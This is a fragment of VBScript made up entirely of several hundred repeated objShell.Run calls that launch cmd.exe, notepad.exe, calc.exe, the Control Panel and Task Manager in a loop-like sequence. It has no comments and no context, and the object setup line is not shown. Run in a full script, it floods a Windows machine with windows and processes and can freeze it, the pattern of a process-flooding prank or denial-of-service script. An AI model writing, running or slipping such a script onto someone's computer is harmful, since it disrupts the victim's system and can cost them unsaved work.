objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
